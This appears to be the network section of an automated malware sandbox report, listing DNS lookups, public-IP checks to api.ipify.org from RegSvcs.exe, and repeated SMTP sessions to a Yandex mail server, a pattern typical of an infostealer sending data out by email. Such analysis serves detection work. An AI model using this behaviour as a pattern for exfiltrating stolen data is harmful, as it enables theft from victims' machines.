                                                          Nov 21, 2024 09:04:57.429418087 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.432847977 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.549087048 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.549098969 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.549115896 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.549146891 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.550296068 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.552360058 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552382946 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552481890 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552515984 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552577019 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.552604914 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552618980 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552673101 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552685976 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.552771091 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.552776098 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.552782059 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.553076029 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.669899940 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.669965982 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.670049906 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.672111034 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.672238111 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.672312021 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.672337055 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.672446012 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.672528028 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.672528028 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.672588110 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.672791958 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.672863960 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.672924042 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.673101902 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.673176050 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.673757076 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:57.713860035 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.789937973 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.790028095 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792121887 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792246103 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792366982 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792422056 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792660952 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792690992 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792814970 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.792999983 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793126106 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793135881 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793159008 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793451071 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793478966 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793664932 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793695927 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793859959 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793870926 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793986082 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.793989897 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:57.794040918 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:58.816847086 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:59.048379898 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:59.165952921 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:59.166886091 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:02.308870077 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:02.428563118 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:02.774043083 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:02.774113894 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:02.776144981 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:02.780483007 CET50001587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:02.851378918 CET50002587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:02.900254011 CET5875000177.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:02.971045017 CET5875000277.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:02.971158981 CET50002587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:03.002827883 CET50002587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:03.058795929 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:03.122489929 CET5875000277.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:03.126946926 CET50002587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:03.178426027 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:03.178997993 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:04.471091032 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:04.471282959 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:04.590900898 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:04.917336941 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:04.920950890 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:05.040498972 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.369388103 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.370989084 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:05.490598917 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.821451902 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.821566105 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.821573973 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.821734905 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:05.821819067 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:05.821819067 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:05.826191902 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:05.945631027 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:06.272329092 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:06.275126934 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:06.394759893 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:06.721570969 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:06.722166061 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:06.841793060 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:07.168320894 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:07.168643951 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:07.288250923 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:07.756125927 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:07.757108927 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:07.876697063 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:08.268471956 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:08.268867016 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:08.388797045 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:08.822340012 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:08.827028990 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:08.946537018 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.273098946 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.273675919 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.273710966 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.273710966 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.273788929 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.275131941 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.393383980 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.393390894 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.393407106 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.393412113 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.393507004 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.394723892 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.394735098 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.394815922 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.394817114 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.394848108 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.394897938 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.394920111 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.394968987 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.395015955 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.395020962 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.395026922 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.395060062 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.395138025 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.395323992 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.513044119 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.513120890 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.513164043 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.513262987 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.514473915 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.514552116 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.514652967 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.514808893 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.514831066 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.514966011 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.514966011 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.515085936 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.515219927 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.515336037 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.515403986 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.515459061 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.515608072 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.515660048 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:09.557884932 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.632925034 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.633048058 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637289047 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637295008 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637310982 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637315989 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637350082 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637353897 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637367964 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637375116 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637379885 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637383938 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637393951 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637398005 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637407064 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637411118 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637419939 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637423992 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637427092 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637444973 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637470961 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637476921 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637756109 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:10.682054043 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:10.735905886 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.541387081 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.660993099 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:53.988724947 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:53.988761902 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:53.988811970 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.989232063 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.991404057 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:54.108719110 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:54.110996962 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:54.111069918 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:55.357485056 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:55.357769966 CET50005587192.168.2.677.88.21.158
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 09:02:05.925415039 CET | 62514 | 53 | 192.168.2.6 | 1.1.1.1
Nov 21, 2024 09:02:06.151273012 CET | 53 | 62514 | 1.1.1.1 | 192.168.2.6
Nov 21, 2024 09:02:08.599760056 CET | 56471 | 53 | 192.168.2.6 | 1.1.1.1
Nov 21, 2024 09:02:08.825994015 CET | 53 | 56471 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 09:02:05.925415039 CET | 192.168.2.6 | 1.1.1.1 | 0xb7a | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 21, 2024 09:02:08.599760056 CET | 192.168.2.6 | 1.1.1.1 | 0x6583 | Standard query (0) | smtp.yandex.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 09:02:06.151273012 CET | 1.1.1.1 | 192.168.2.6 | 0xb7a | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 09:02:06.151273012 CET | 1.1.1.1 | 192.168.2.6 | 0xb7a | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 09:02:06.151273012 CET | 1.1.1.1 | 192.168.2.6 | 0xb7a | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 09:02:08.825994015 CET | 1.1.1.1 | 192.168.2.6 | 0x6583 | No error (0) | smtp.yandex.com | smtp.yandex.ru | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 09:02:08.825994015 CET | 1.1.1.1 | 192.168.2.6 | 0x6583 | No error (0) | smtp.yandex.ru | | 77.88.21.158 | A (IP address) | IN (0x0001) | false
• api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 104.26.13.205 | 443 | 7088 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 08:02:07 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-21 08:02:07 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Thu, 21 Nov 2024 08:02:07 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e5f27de28625e71-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1747&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1671436&cwnd=238&unsent_bytes=0&cid=07316f2fad495ed1&ts=458&x=0"
2024-11-21 08:02:07 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
    Data Ascii: 8.46.123.75


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49716 | 104.26.13.205 | 443 | 7392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-21 08:02:12 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-21 08:02:12 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Thu, 21 Nov 2024 08:02:12 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e5f27fc1eea425f-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1814791&cwnd=235&unsent_bytes=0&cid=9e089e2987291928&ts=794&x=0"
2024-11-21 08:02:12 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
    Data Ascii: 8.46.123.75


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 21, 2024 09:02:10.243345022 CET | 587 | 49714 | 77.88.21.158 | 192.168.2.6 | 220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1732176129-92ONt11OciE0
Nov 21, 2024 09:02:10.243590117 CET | 49714 | 587 | 192.168.2.6 | 77.88.21.158 | EHLO 367706
Nov 21, 2024 09:02:10.691677094 CET | 587 | 49714 | 77.88.21.158 | 192.168.2.6 | 250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 21, 2024 09:02:14.765059948 CET | 587 | 49724 | 77.88.21.158 | 192.168.2.6 | 220 mail-nwsmtp-smtp-production-main-64.vla.yp-c.yandex.net Ok 1732176134-E2Otb81Oo4Y0
Nov 21, 2024 09:02:14.802515984 CET | 49724 | 587 | 192.168.2.6 | 77.88.21.158 | EHLO 367706
Nov 21, 2024 09:02:15.265408039 CET | 587 | 49724 | 77.88.21.158 | 192.168.2.6 | 250-mail-nwsmtp-smtp-production-main-64.vla.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 21, 2024 09:02:15.265916109 CET | 49724 | 587 | 192.168.2.6 | 77.88.21.158 | STARTTLS
Nov 21, 2024 09:02:15.728729010 CET | 587 | 49724 | 77.88.21.158 | 192.168.2.6 | 220 Go ahead
Nov 21, 2024 09:02:22.464337111 CET | 587 | 49747 | 77.88.21.158 | 192.168.2.6 | 220 mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net Ok 1732176142-M2Ovap0OkKo0
Nov 21, 2024 09:02:22.464531898 CET | 49747 | 587 | 192.168.2.6 | 77.88.21.158 | EHLO 367706
Nov 21, 2024 09:02:22.924563885 CET | 587 | 49747 | 77.88.21.158 | 192.168.2.6 | 250-mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 21, 2024 09:02:22.924829006 CET | 49747 | 587 | 192.168.2.6 | 77.88.21.158 | STARTTLS
Nov 21, 2024 09:02:23.384685040 CET | 587 | 49747 | 77.88.21.158 | 192.168.2.6 | 220 Go ahead
Nov 21, 2024 09:03:47.723155975 CET | 587 | 49940 | 77.88.21.158 | 192.168.2.6 | 220 mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net Ok 1732176227-l3O5Q51OnuQ0
Nov 21, 2024 09:03:47.723365068 CET | 49940 | 587 | 192.168.2.6 | 77.88.21.158 | EHLO 367706
Nov 21, 2024 09:03:48.170960903 CET | 587 | 49940 | 77.88.21.158 | 192.168.2.6 | 250-mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 21, 2024 09:03:48.171999931 CET | 49940 | 587 | 192.168.2.6 | 77.88.21.158 | STARTTLS
Nov 21, 2024 09:03:48.619554043 CET | 587 | 49940 | 77.88.21.158 | 192.168.2.6 | 220 Go ahead
Nov 21, 2024 09:03:57.559294939 CET | 587 | 49965 | 77.88.21.158 | 192.168.2.6 | 220 mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net Ok 1732176237-v3O7xp0OoiE0
Nov 21, 2024 09:03:57.559839964 CET | 49965 | 587 | 192.168.2.6 | 77.88.21.158 | EHLO 367706
Nov 21, 2024 09:03:58.012135029 CET | 587 | 49965 | 77.88.21.158 | 192.168.2.6 | 250-mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 21, 2024 09:03:58.012548923 CET | 49965 | 587 | 192.168.2.6 | 77.88.21.158 | STARTTLS
Nov 21, 2024 09:03:58.464906931 CET | 587 | 49965 | 77.88.21.158 | 192.168.2.6 | 220 Go ahead
Nov 21, 2024 09:04:36.719955921 CET | 587 | 49998 | 77.88.21.158 | 192.168.2.6 | 220 mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net Ok 1732176276-a4Oksw0OmSw0
Nov 21, 2024 09:04:36.720521927 CET | 49998 | 587 | 192.168.2.6 | 77.88.21.158 | EHLO 367706
Nov 21, 2024 09:04:37.168386936 CET | 587 | 49998 | 77.88.21.158 | 192.168.2.6 | 250-mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:04:37.168534040 CET49998587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:04:37.617652893 CET5874999877.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:04:52.640229940 CET5875000177.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net Ok 1732176292-q4OvOK1OpGk0
                                                          Nov 21, 2024 09:04:52.640386105 CET50001587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:04:53.106096983 CET5875000177.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:04:53.106725931 CET50001587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:04:53.571733952 CET5875000177.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:05:04.471091032 CET5875000377.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-59.iva.yp-c.yandex.net Ok 1732176304-45OJsm0Oq8c0
                                                          Nov 21, 2024 09:05:04.471282959 CET50003587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:05:04.917336941 CET5875000377.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-59.iva.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:05:04.920950890 CET50003587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:05:05.369388103 CET5875000377.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:05:55.357485056 CET5875000577.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732176355-t5OuYt0OjSw0
                                                          Nov 21, 2024 09:05:55.357769966 CET50005587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:05:55.793834925 CET5875000577.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:05:55.798875093 CET50005587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:05:56.234978914 CET5875000577.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:05:57.730782986 CET5875000677.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net Ok 1732176357-v5OlBB1OhW20
                                                          Nov 21, 2024 09:05:57.731031895 CET50006587192.168.2.677.88.21.158EHLO 367706
